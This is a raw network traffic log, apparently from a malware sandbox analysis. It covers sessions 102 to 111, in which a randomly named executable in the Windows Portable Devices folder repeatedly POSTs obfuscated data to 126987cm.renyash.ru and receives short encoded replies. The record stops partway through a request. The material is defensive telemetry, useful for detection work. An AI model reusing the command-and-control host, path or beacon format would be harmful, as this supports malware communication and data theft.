                                                                                                                                102192.168.2.450109172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:42.365561962 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:42.718307972 CET1072OUTData Raw: 54 5e 5b 55 56 42 5c 52 5d 56 5b 57 54 59 51 52 58 55 58 51 5b 51 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[UVB\R]V[WTYQRXUXQ[QWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X$# 2683Z6+S+'$"73*>&(1!^&%X*3


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                103192.168.2.450110172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:42.764910936 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:43.238221884 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:43.262908936 CET1788OUTData Raw: 51 54 5b 53 53 40 59 51 5d 56 5b 57 54 5f 51 5e 58 5c 58 50 5b 51 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QT[SS@YQ]V[WT_Q^X\XP[QWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X$#!=!7\3"4(44!6 306\*@><7':!^&%X*+
                                                                                                                                Jan 1, 2025 21:48:43.608258963 CET956INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:43 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0UJW2TFtK8jYF3aofwX3xCM4KDvnyMkIBYJrSn0Xs5vKBkGvj%2F5pSeI5xu3%2FUbqKMbrWx0UYzWm6VJ%2Ffah6dL7zZhCBwPljOeljqPwWAr9wAagFIvklD7Y274FxRQSDpaE%2F1j3S"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f2defbd5e66-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3600&min_rtt=2044&rtt_var=3879&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=100717&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 52 28 35 33 1f 21 31 26 0b 28 28 20 06 26 31 2e 12 32 23 08 1c 3c 06 33 14 3f 01 2f 09 32 12 38 5d 30 3a 07 51 3f 22 3c 1f 29 0c 20 5c 05 1b 39 19 24 00 37 12 24 38 3d 1f 3d 0e 24 5f 20 11 00 5b 2a 55 23 0c 23 2b 25 5a 32 16 22 0a 33 2a 0b 0d 2b 02 28 00 29 09 38 08 31 2d 2a 51 0f 16 38 53 3e 30 39 01 29 2f 3f 03 33 31 06 13 21 1b 32 0f 25 05 34 0d 27 39 26 5b 3f 07 20 0e 35 0d 20 0b 31 3f 35 06 26 00 2f 51 2c 3a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!R(53!1&(( &1.2#<3?/28]0:Q?"<) \9$7$8==$_ [*U##+%Z2"3*+()81-*Q8S>09)/?31!2%4'9&[? 5 1?5&/Q,:&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                104192.168.2.450111172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:43.034423113 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:43.402575970 CET1072OUTData Raw: 54 5f 5b 57 53 44 59 51 5d 56 5b 57 54 5a 51 5c 58 57 58 5f 5b 52 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_[WSDYQ]V[WTZQ\XWX_[RWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X3!; 1167^36((U6&$$36*%%<-#%:!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:43.479826927 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:43.752988100 CET810INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:43 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uA5aeJPGko2Z1Zu5P4B3RcHtLIhxlMtXcVcjoVdP2sIYpRPDrY8%2FONceFM3YBv%2Fr9N25EE%2BqpU8O3d%2B4FY8fkKNqhMkgUslc%2F1%2FBhU8Fu9lU6brxco368zb85iV1CKjCcuLx5r3z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f2f7f1278db-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4061&min_rtt=2292&rtt_var=4397&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=88780&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                105192.168.2.450112172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:43.878165007 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:44.233675957 CET1072OUTData Raw: 54 55 5e 52 56 45 5c 54 5d 56 5b 57 54 59 51 5e 58 57 58 51 5b 56 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TU^RVE\T]V[WTYQ^XWXQ[VWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_&!/X#!-Z .\$-#"#+$;T5,U'3)*!E+-$_&!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:44.349385023 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:44.617820024 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:44 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oQ8SyLiBaIZefZL9EER7iQaWX338IWJ%2BPIRttSlVXKiWckOpUAS1ntHaZ3CfQOzQkaBMCKwrwFvwVD63xszQBU%2BbEWSFiQr7KP13hZVrfde2RqF88ZohbwgEf9sI0UirLwv5E%2Bg4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f34d82b435e-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3381&min_rtt=1596&rtt_var=4168&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=91956&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                106192.168.2.450113172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:44.747967005 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:45.093249083 CET1072OUTData Raw: 54 51 5b 5e 56 41 59 53 5d 56 5b 57 54 5f 51 59 58 55 58 58 5b 5e 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ[^VAYS]V[WT_QYXUXX[^WAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!'0 "1Z5-#['-#"+/<?W!6'$.>@%D?>8':!^&%X*+
                                                                                                                                Jan 1, 2025 21:48:45.192179918 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:45.372132063 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:45 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9xpDObtqmZaCISCBin%2BiLJJG3NPBMfmENziTbPOhjKtj2b%2Bmo3IZC7GvVoCfB4H60ZwAviRjt19KDlP5RtjL8YV23UUPGujc9r7O8htSouemRTdFlRNTnMJQR81t0Pfk7lTOodxg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f3a2c2517e9-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2835&min_rtt=1617&rtt_var=3043&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=128453&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                107192.168.2.450114172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:45.537296057 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:45.893387079 CET1072OUTData Raw: 54 55 5b 51 56 40 59 52 5d 56 5b 57 54 5d 51 5a 58 57 58 5c 5b 51 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TU[QV@YR]V[WT]QZXWX\[QWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_334)X"X<%.8"]?W+$#5#$ [==@<72:!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:45.991381884 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:46.269076109 CET799INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:46 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NyZ12pz7w9G785BbFTZKaebAWA95G7swgwX6FQXVrF293yBtNkkTx5jBdPJS5E06iXlPp9PbTqZalvQiDw7DGD6FZtI1gSHhAbzP9J7tmtQ4SysfiJlZmgNG44ywUUCIjsWBrK74"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f3f2e2c41bb-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2762&min_rtt=1589&rtt_var=2943&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=133005&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                108192.168.2.450115172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:46.391412020 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:46.749249935 CET1072OUTData Raw: 54 5f 5b 50 53 40 59 56 5d 56 5b 57 54 5b 51 59 58 5c 58 5e 5b 57 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_[PS@YV]V[WT[QYX\X^[WWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$'[#1-[ .7\'.,[6(;T<$V!5(V%31*)(?1!^&%X*
                                                                                                                                Jan 1, 2025 21:48:46.845751047 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:47.109333992 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:47 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pbVsz1QXRTyQhOG3dKDi3L8%2BG%2F1UCqsQW8Q31IDB84QKFhXUX8PHsTqVnqtKlZTg26TR%2BVTcRKfwKzaju7DL05%2FoL1Jz99cyQjEC9NtrdgZ8zjJ2NKKGwM9l0EzZ5X9otliY6cs6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f447df54356-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3527&min_rtt=1754&rtt_var=4204&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=91593&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                109192.168.2.450116172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:47.248581886 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:47.592991114 CET1072OUTData Raw: 54 50 5e 50 56 43 59 53 5d 56 5b 57 54 59 51 5b 58 51 58 5f 5b 51 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TP^PVCYS]V[WTYQ[XQX_[QWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^3'_79!3358('"$'"]=%6(?1!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:47.693223000 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:47.883339882 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:47 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IrK1g9kTVKfhGx6jpq4RNgvH2O5zOtPw1Okobmf2J6JHeOSPtBn7h6sAt7CXfjkZpjtvefEa3b2w4MTJoszfp0OkJF0so%2FxkxlXesVfQU7kdYCLxE7MaXvW0bOgME4%2BYJ0I0xYkK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f49cebf8c89-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4882&min_rtt=1825&rtt_var=6799&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=55549&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                110192.168.2.450117172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:48.015149117 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:48.374222994 CET1072OUTData Raw: 54 56 5b 54 53 43 59 5f 5d 56 5b 57 54 5d 51 59 58 54 58 51 5b 51 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV[TSCY_]V[WT]QYXTXQ[QWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!'" = = %=!#R+"64W$#&)!@?.;%:!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:48.468806982 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:48.642044067 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:48 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tzQ3SVZWgXowcV3nx6rKWiQcHFDU8lbq7Ewe73TX4GMappmLLsF53cwXhBJUV7ZRuM6nzTikEqUjfbZdoHyJulOG%2BTwlNVSExLhRlDe9NNodlrtFPNJaa%2FH1OGS7f%2FDYfJonWkpb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f4e9ac9437e-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3597&min_rtt=1581&rtt_var=4626&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=82425&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                111192.168.2.450118172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:48.797069073 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
